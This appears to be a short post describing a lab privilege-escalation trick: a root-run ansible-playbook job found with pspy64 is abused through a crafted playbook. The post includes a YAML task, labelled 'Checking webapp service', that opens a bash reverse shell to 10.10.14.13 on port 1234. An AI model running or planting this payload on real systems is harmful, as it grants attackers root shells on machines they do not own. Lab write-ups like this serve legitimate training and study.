Hi Friends
Just exercise arround with some vulnerable box available. I found something simple but effective in escalating our privilege.
During my post exploitation, I did a enumeration using pspy64 and I found something quite interesting because a process called ansible-playbook is run periodically based on the configuration specified in playbook_1.yml
We can see that this service is run underthe root privilege as we can see that the id = 0. In this case we can make an ansible configuration in order to execute our malicious activities
I would like to share a simple ansible yaml file in order to initiate reverse shell
- hosts: localhost
tasks:
- name: Checking webapp service
shell: /bin/bash -c '/bin/bash -i > /dev/tcp/10.10.14.13/1234 0<&1 2>&1' '
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 